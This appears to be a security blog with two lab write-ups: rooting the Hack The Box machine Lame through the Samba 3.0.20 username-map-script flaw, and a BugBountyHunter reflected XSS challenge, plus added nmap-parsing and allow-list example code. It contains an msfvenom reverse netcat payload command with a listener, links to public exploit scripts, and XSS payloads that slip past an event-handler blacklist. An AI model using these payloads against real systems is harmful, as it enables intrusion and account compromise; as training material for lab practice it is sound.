
Tag: Writeups

HTB Writeup: Lame w/o Metasploit

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploit scripts for each service version that could lead to root.
  • Test the exploits to see whether the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection>
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

The full scan reveals an additional service on port 3632 (distccd) that the quick scan, which only covers nmap's default 1000 most common ports, did not find.
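As an added example (not part of the original writeup), the following script reads the .xml files that -oA writes for the two scans and lists the open ports that only the full -p- scan found. The two XML documents embedded below are constructed to mirror the results described here, not real scan output; with real files, pass the contents of quickscan.xml and fullscan.xml instead.

```python
"""Compare the -oA XML output of the quick and full nmap scans.

Added example, not part of the original writeup. It lists the open ports that
appear only in the full (-p-) scan. The XML below is constructed to mirror the
results described in the writeup; it is not copied from real scan output.
"""
import xml.etree.ElementTree as ET

# Constructed sample of what `-oA quickscan` might have written for 10.10.10.3.
QUICKSCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><address addr="10.10.10.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed sample of the full -p- scan: the same host plus distccd on 3632.
FULLSCAN_XML = QUICKSCAN_XML.replace(
    "    </ports>",
    '      <port protocol="tcp" portid="3632"><state state="open"/>'
    '<service name="distccd" product="distccd" version="v1"/></port>\n    </ports>',
)


def open_ports(nmap_xml: str) -> dict:
    """Return {(proto, port): "name product version"} for every open port in an nmap XML document."""
    root = ET.fromstring(nmap_xml)
    found = {}
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue
        svc = port.find("service")
        parts = [svc.get(k) for k in ("name", "product", "version")] if svc is not None else []
        key = (port.get("protocol"), int(port.get("portid")))
        found[key] = " ".join(p for p in parts if p)
    return found


def only_in_full(quick_xml: str, full_xml: str) -> dict:
    """Open ports present in the full scan but missing from the quick scan."""
    quick = open_ports(quick_xml)
    full = open_ports(full_xml)
    return {k: v for k, v in full.items() if k not in quick}


if __name__ == "__main__":
    # With real files: open("quickscan.xml").read() and open("fullscan.xml").read()
    for (proto, port), service in sorted(only_in_full(QUICKSCAN_XML, FULLSCAN_XML).items()):
        print(f"{port}/{proto}  {service}  (only in full scan)")
```

The same diff works on any pair of -oA runs, for example a TCP scan against a later UDP scan, because it compares (protocol, port) tuples rather than port numbers alone.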


Enumeration

We discovered five exposed services from the port-scan results:

  1. ftp (port: 21, version: vsftpd 2.3.4)
  2. ssh (port: 22, version: OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port: 139, version: Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port: 445, version: Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port: 3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)))

FTP

One convenient way of checking whether a service version has a public exploit is the searchsploit tool in Kali Linux. For vsftpd 2.3.4 it lists the well-known backdoor in this version: a login whose username contains the string :) makes the daemon open a command shell on TCP port 6200.

We can try googling for a Python exploit. I found this one on GitHub:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There are a few user-enumeration attacks for this SSH version. They usually take time, so we come back to SSH only if the other services turn out not to be exploitable.

Samba

This Samba version (3.0.20) has a well-known exploit: the "username map script" command injection (CVE-2007-2447), in which shell metacharacters placed in the SMB username are passed by smbd to a shell.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST (the VPN address the box can reach back to): ip addr | grep tun0
  • Generate the reverse netcat payload: msfvenom -p cmd/unix/reverse_netcat LHOST=<your LHOST> LPORT=<any port; the listener you start later must use the same one> -f python
  • Replace lines 8 to 15 of the script with the payload generated by msfvenom.
  • Update the victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start a netcat listener on the LPORT you gave msfvenom: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

The listener receives a shell running as root, so we can now read the flag directly.


Reflections on the lab

This was the first lab I completed on Hack The Box (HTB). I learned a few things here:

  • This is a bit different from the purely web-application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits and how to modify and debug the scripts that you find online.
  • You need to know some tools, such as msfvenom, netcat and Python.
  • Port scanning also needs to be thorough, in order to discover the services that the quick scan does not find.

Writeups on Free Challenges in BugBountyHunter

In this post, I will share some writeups on the free challenges on the BugBountyHunter platform. I encourage everyone to check out the site https://www.bugbountyhunter.com/.

Cross-Site Scripting in Image Tag

https://www.bugbountyhunter.com/challenge?id=2

How does the feature work? If you select an option from the dropdown, the image is rendered with a CSS effect. In the img tag, the selected option's value appears in the class attribute.

What could go wrong? The POST request looks suspicious.

Request

There is no server-side validation of the imageClass value: you can send any value and it is reflected in the response.

Response

We can send a few payloads to test for XSS. First, set imageClass=helloworld" onload="alert(1)". The response contains class="1" in the tag. Next, try imageClass=helloworld" onclick="alert(1)". The response again contains class="1".

So the server appears to blacklist certain event-handler names such as onload and onclick, and we need an event handler that is not on the list. This payload was not blocked: img2" onpointerup="alert('xss'). The double quote closes the class attribute, and the rest is reflected as a new attribute of the img tag.

When we click on the image in the browser, the malicious script is executed.
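To show the underlying defect and its fix, here is an added example in Python (not the challenge's real server code): a keyword blacklist that mirrors the behaviour observed above, beside an allow-list that accepts only the class names the dropdown offers. The class names, the blocked keywords and the image path are assumptions.

```python
"""Blacklist versus allow-list for a reflected attribute value.

Added example, not the challenge's real code. render_blacklisted models the
observed behaviour: a few event-handler names are blocked (the response then
carries class="1"), so onpointerup slips through and the value breaks out of
the class attribute. render_allowlisted is the fix: accept only the class
names the dropdown offers, and HTML-encode whatever is echoed regardless.
"""
import html
import re

# Constructed, deliberately incomplete, like any handler blacklist eventually is.
BLOCKED_HANDLERS = ("onload", "onclick", "onerror", "onmouseover")
# Assumed set of dropdown options (the real challenge's names are not known here).
ALLOWED_CLASSES = frozenset({"img1", "img2", "img3", "grayscale", "sepia"})
IMG_SRC = "/img/cat.png"   # assumed


def render_blacklisted(image_class: str) -> str:
    """Vulnerable: keyword filter, then the value is reflected verbatim."""
    lowered = image_class.lower()
    if any(handler in lowered for handler in BLOCKED_HANDLERS):
        image_class = "1"   # mirrors the class="1" seen for filtered payloads
    return f'<img src="{IMG_SRC}" class="{image_class}">'


def render_allowlisted(image_class: str, default: str = "img1") -> str:
    """Hardened: only known class names are accepted, and output is encoded anyway.
    The allow-list is the real control; html.escape is defence in depth."""
    chosen = image_class if image_class in ALLOWED_CLASSES else default
    return f'<img src="{IMG_SRC}" class="{html.escape(chosen, quote=True)}">'


def attribute_breakout(markup: str) -> bool:
    """Rough check: did the value close the class attribute and add an on* handler?"""
    return re.search(r'class="[^"]*"\s+on\w+=', markup) is not None


if __name__ == "__main__":
    for payload in ('helloworld" onload="alert(1)',
                    'helloworld" onclick="alert(1)',
                    "img2\" onpointerup=\"alert('xss')"):
        weak = render_blacklisted(payload)
        strong = render_allowlisted(payload)
        print(f"{payload!r}\n  blacklist : {weak}  breakout={attribute_breakout(weak)}"
              f"\n  allowlist : {strong}  breakout={attribute_breakout(strong)}")
```

The allow-list version never needs updating when a new event handler appears in browsers, because it rejects anything that is not one of its own option names; the blacklist version needs a new entry for every handler an attacker finds.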